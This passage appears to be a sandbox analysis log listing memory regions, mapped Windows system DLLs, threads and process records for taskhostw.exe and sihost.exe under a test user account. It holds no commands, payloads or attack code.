0x7ff8fdc258d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5634 start_va = 0x7ff8fdd30000 end_va = 0x7ff8fdd37fff monitored = 0 entry_point = 0x7ff8fdd31ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5635 start_va = 0x7ff8fdd40000 end_va = 0x7ff8fde82fff monitored = 0 entry_point = 0x7ff8fdd68210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5636 start_va = 0x7ff8fdf10000 end_va = 0x7ff8fdfd0fff monitored = 0 entry_point = 0x7ff8fdf30da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5637 start_va = 0x7ff8fe040000 end_va = 0x7ff8fe09afff monitored = 0 entry_point = 0x7ff8fe0538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5638 start_va = 0x7ff8fe0a0000 end_va = 0x7ff8fe13cfff monitored = 0 entry_point = 0x7ff8fe0a78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5639 start_va = 0x7ff8ff8d0000 end_va = 0x7ff8ffa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5640 start_va = 0x4b0000 end_va = 0x4ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 5667 start_va = 0x1200000 end_va = 0x12dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5668 start_va = 0x7ff8f43a0000 end_va = 0x7ff8f43b3fff monitored = 0 entry_point = 0x7ff8f43a1a50 region_type = mapped_file name = "wlanradiomanager.dll" filename = "\\Windows\\System32\\WlanRadioManager.dll" (normalized: "c:\\windows\\system32\\wlanradiomanager.dll") Region: id = 5669 start_va = 0x7ff8f51a0000 end_va = 0x7ff8f51d7fff monitored = 0 entry_point = 0x7ff8f51b8cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 5670 start_va = 0x7ff8f5f80000 end_va = 0x7ff8f5fe0fff monitored = 0 entry_point = 0x7ff8f5f84b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 5671 start_va = 0x7ff8f4380000 end_va = 0x7ff8f4398fff monitored = 0 entry_point = 0x7ff8f4382180 region_type = mapped_file name = "bthradiomedia.dll" filename = "\\Windows\\System32\\BthRadioMedia.dll" (normalized: "c:\\windows\\system32\\bthradiomedia.dll") Region: id = 5672 start_va = 0x7ff8fc940000 end_va = 0x7ff8fc982fff monitored = 0 entry_point = 0x7ff8fc954b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 5673 start_va = 0x7ff8fa910000 end_va = 0x7ff8fa936fff monitored = 0 entry_point = 0x7ff8fa917940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 5674 start_va = 0x7ff8f4360000 end_va = 0x7ff8f437dfff monitored = 0 entry_point = 0x7ff8f4361690 region_type = mapped_file name = "bluetoothapis.dll" filename = "\\Windows\\System32\\BluetoothApis.dll" (normalized: "c:\\windows\\system32\\bluetoothapis.dll") Region: id = 5678 start_va = 0x7ff8f51e0000 end_va = 0x7ff8f51eafff monitored = 0 entry_point = 0x7ff8f51e1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 5679 start_va = 0x7ff8fdea0000 end_va = 0x7ff8fdf0afff monitored = 0 entry_point = 0x7ff8fdeb90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5680 start_va = 0x3200000 end_va = 0x32fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 5682 start_va = 0x7ff8fb820000 end_va = 0x7ff8fb87bfff monitored = 0 entry_point = 0x7ff8fb836f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 5685 start_va = 0x7ff8faef0000 end_va = 0x7ff8faf13fff monitored = 0 entry_point = 0x7ff8faef3260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 5691 start_va = 0x4af0000 end_va = 0x4beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004af0000" filename = "" Region: id = 5850 start_va = 0x4bf0000 end_va = 0x4ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004bf0000" filename = "" Region: id = 5851 start_va = 0x7ff8f5eb0000 end_va = 0x7ff8f5f77fff monitored = 0 entry_point = 0x7ff8f5ef13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 5931 start_va = 0x7ff8fbef0000 end_va = 0x7ff8fbf3afff monitored = 0 entry_point = 0x7ff8fbef35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 5932 start_va = 0x4cf0000 end_va = 0x4deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004cf0000" filename = "" Region: id = 5933 start_va = 0x7ff8f5180000 end_va = 0x7ff8f5195fff monitored = 0 entry_point = 0x7ff8f51819f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 5934 start_va = 0x7ff8f5160000 end_va = 0x7ff8f5179fff monitored = 0 entry_point = 0x7ff8f5162430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 5936 start_va = 0x7ff8fa960000 end_va = 0x7ff8faa09fff monitored = 0 entry_point = 0x7ff8fa987910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 5939 start_va = 0x7ff8f3720000 end_va = 0x7ff8f3729fff monitored = 0 entry_point = 0x7ff8f37214c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 6184 start_va = 0x4df0000 end_va = 0x4eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004df0000" filename = "" Region: id = 6185 start_va = 0x7ff8f1920000 end_va = 0x7ff8f1935fff monitored = 0 entry_point = 0x7ff8f192b550 region_type = mapped_file name = "clipc.dll" filename = "\\Windows\\System32\\Clipc.dll" (normalized: "c:\\windows\\system32\\clipc.dll") Region: id = 6186 start_va = 0x7ff8f1940000 end_va = 0x7ff8f1a7cfff monitored = 0 entry_point = 0x7ff8f195a6a0 region_type = mapped_file name = "licensemanager.dll" filename = "\\Windows\\System32\\LicenseManager.dll" (normalized: "c:\\windows\\system32\\licensemanager.dll") Region: id = 6187 start_va = 0x7ff8f1a80000 end_va = 0x7ff8f1a8afff monitored = 0 entry_point = 0x7ff8f1a81a20 region_type = mapped_file name = "licensemanagersvc.dll" filename = "\\Windows\\System32\\LicenseManagerSvc.dll" (normalized: "c:\\windows\\system32\\licensemanagersvc.dll") Region: id = 6188 start_va = 0x7ff8fc9b0000 end_va = 0x7ff8fca64fff monitored = 0 entry_point = 0x7ff8fc9f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 6216 start_va = 0x4ef0000 end_va = 0x4feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ef0000" filename = "" Thread: id = 351 os_tid = 0x520 Thread: id = 352 os_tid = 0x518 Thread: id = 353 os_tid = 0x484 Thread: id = 354 os_tid = 0x280 Thread: id = 355 os_tid = 0x16c Thread: id = 356 os_tid = 0x174 Thread: id = 357 os_tid = 0x18c Thread: id = 358 os_tid = 0x3e4 Thread: id = 359 os_tid = 0x3e0 Thread: id = 360 os_tid = 0x3dc Thread: id = 361 os_tid = 0x3c0 Thread: id = 362 os_tid = 0x3bc Thread: id = 363 os_tid = 0x524 Thread: id = 364 os_tid = 0x528 Thread: id = 365 os_tid = 0x52c Thread: id = 368 os_tid = 0x5ac Thread: id = 379 os_tid = 0x5ec Thread: id = 398 os_tid = 0x650 Thread: id = 429 os_tid = 0x71c Thread: id = 439 os_tid = 0x750 Process: id = "87" image_name = "taskhostw.exe" filename = "c:\\windows\\system32\\taskhostw.exe" page_root = "0x172ff000" os_pid = "0x5b4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "84" os_parent_pid = "0x3e8" cmd_line = "taskhostw.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010b7c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5693 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5694 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5695 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 5696 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5697 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5698 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 5699 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 5700 start_va = 0x7ff65f040000 end_va = 0x7ff65f058fff monitored = 0 entry_point = 0x7ff65f0459b0 region_type = mapped_file name = "taskhostw.exe" filename = "\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe") Region: id = 5701 start_va = 0x7ff8ff8d0000 end_va = 0x7ff8ffa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5727 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 5728 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 5729 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 5730 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5731 start_va = 0x4f0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 5732 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 5733 start_va = 0x7ff8fc5d0000 end_va = 0x7ff8fc7b7fff monitored = 0 entry_point = 0x7ff8fc5fba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5734 start_va = 0x7ff8fd1f0000 end_va = 0x7ff8fd29cfff monitored = 0 entry_point = 0x7ff8fd2081a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5735 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5736 start_va = 0x7ff8fe0a0000 end_va = 0x7ff8fe13cfff monitored = 0 entry_point = 0x7ff8fe0a78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5737 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5738 start_va = 0x7ff8fcfc0000 end_va = 0x7ff8fd0dbfff monitored = 0 entry_point = 0x7ff8fd0002b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5739 start_va = 0x7ff8fccd0000 end_va = 0x7ff8fcf4cfff monitored = 0 entry_point = 0x7ff8fcda4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5740 start_va = 0x7ff8fc870000 end_va = 0x7ff8fc8d9fff monitored = 0 entry_point = 0x7ff8fc8a6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 5741 start_va = 0x7ff8fdf10000 end_va = 0x7ff8fdfd0fff monitored = 0 entry_point = 0x7ff8fdf30da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5742 start_va = 0x5f0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 5743 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5744 start_va = 0x700000 end_va = 0x842fff monitored = 0 entry_point = 0x728210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5745 start_va = 0x5f0000 end_va = 0x6ccfff monitored = 0 entry_point = 0x64e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 5746 start_va = 0x6f0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 5747 start_va = 0x7ff8fbf40000 end_va = 0x7ff8fbf4efff monitored = 0 entry_point = 0x7ff8fbf43210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 5748 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5749 start_va = 0x7ff8fe040000 end_va = 0x7ff8fe09afff monitored = 0 entry_point = 0x7ff8fe0538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5750 start_va = 0x5f0000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 5751 start_va = 0x7ff8fda00000 end_va = 0x7ff8fdb55fff monitored = 0 entry_point = 0x7ff8fda0a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5752 start_va = 0x7ff8fd870000 end_va = 0x7ff8fd9f5fff monitored = 0 entry_point = 0x7ff8fd8bffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5753 start_va = 0x480000 end_va = 0x4b8fff monitored = 0 entry_point = 0x4812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5754 start_va = 0x700000 end_va = 0x887fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 5755 start_va = 0x7ff8fd6d0000 end_va = 0x7ff8fd70afff monitored = 0 entry_point = 0x7ff8fd6d12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5756 start_va = 0x890000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 5757 start_va = 0xa20000 end_va = 0x1e1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 5758 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5759 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 5760 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskhostw.exe.mui" filename = "\\Windows\\System32\\en-US\\taskhostw.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskhostw.exe.mui") Region: id = 5775 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 5776 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 5777 start_va = 0x7ff8fa870000 end_va = 0x7ff8fa905fff monitored = 0 entry_point = 0x7ff8fa895570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 5778 start_va = 0x1e20000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 5783 start_va = 0x7ff8fd710000 end_va = 0x7ff8fd869fff monitored = 0 entry_point = 0x7ff8fd7538e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5784 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 5785 start_va = 0x1e20000 end_va = 0x1edbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e20000" filename = "" Region: id = 5786 start_va = 0x1fe0000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 5787 start_va = 0x4a0000 end_va = 0x4a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 5788 start_va = 0x7ff8f9ec0000 end_va = 0x7ff8f9ee1fff monitored = 0 entry_point = 0x7ff8f9ec1a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 5790 start_va = 0x670000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 5791 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 5792 start_va = 0x7ff8fdb60000 end_va = 0x7ff8fdc06fff monitored = 0 entry_point = 0x7ff8fdb6b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 5793 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 5794 start_va = 0x7ff8f3e90000 end_va = 0x7ff8f3f88fff monitored = 0 entry_point = 0x7ff8f3ed8000 region_type = mapped_file name = "settingsynccore.dll" filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll") Region: id = 5811 start_va = 0x4d0000 end_va = 0x4d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 5812 start_va = 0x7ff8fc9b0000 end_va = 0x7ff8fca64fff monitored = 0 entry_point = 0x7ff8fc9f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 5813 start_va = 0x7ff8fbf50000 end_va = 0x7ff8fbf63fff monitored = 0 entry_point = 0x7ff8fbf552e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5814 start_va = 0x7ff8fdc10000 end_va = 0x7ff8fdcb6fff monitored = 0 entry_point = 0x7ff8fdc258d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5815 start_va = 0x7ff8fbd80000 end_va = 0x7ff8fbda8fff monitored = 0 entry_point = 0x7ff8fbd94530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 5816 start_va = 0x7ff8fb8d0000 end_va = 0x7ff8fb8e6fff monitored = 0 entry_point = 0x7ff8fb8d79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 5821 start_va = 0x7ff8f3d90000 end_va = 0x7ff8f3e5dfff monitored = 0 entry_point = 0x7ff8f3dc14c0 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 5823 start_va = 0x7ff8f70e0000 end_va = 0x7ff8f7215fff monitored = 0 entry_point = 0x7ff8f710f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 5824 start_va = 0x1ee0000 end_va = 0x1fbcfff monitored = 0 entry_point = 0x1f3e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 5827 start_va = 0x1ee0000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ee0000" filename = "" Region: id = 5828 start_va = 0x1f60000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 5829 start_va = 0x1ff0000 end_va = 0x206ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 5909 start_va = 0x7ff8f95c0000 end_va = 0x7ff8f9a52fff monitored = 0 entry_point = 0x7ff8f95cf760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 5910 start_va = 0x2070000 end_va = 0x209dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002070000" filename = "" Region: id = 5926 start_va = 0x7ff8f51f0000 end_va = 0x7ff8f5230fff monitored = 0 entry_point = 0x7ff8f51f4840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Thread: id = 370 os_tid = 0x5b8 Thread: id = 372 os_tid = 0x5c8 Thread: id = 374 os_tid = 0x5d0 Thread: id = 376 os_tid = 0x5d8 Thread: id = 380 os_tid = 0x5f4 Thread: id = 382 os_tid = 0x5fc Thread: id = 383 os_tid = 0x600 Process: id = "88" image_name = "sihost.exe" filename = "c:\\windows\\system32\\sihost.exe" page_root = "0x175fa000" os_pid = "0x5bc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "84" os_parent_pid = "0x3e8" cmd_line = "sihost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010b7c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5702 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5703 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5704 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 5705 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 5706 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5707 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5708 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5709 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 5710 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 5711 start_va = 0x7ff62f510000 end_va = 0x7ff62f525fff monitored = 0 entry_point = 0x7ff62f515190 region_type = mapped_file name = "sihost.exe" filename = "\\Windows\\System32\\sihost.exe" (normalized: "c:\\windows\\system32\\sihost.exe") Region: id = 5712 start_va = 0x7ff8ff8d0000 end_va = 0x7ff8ffa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5762 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5763 start_va = 0x570000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 5764 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 5765 start_va = 0x7ff8fc5d0000 end_va = 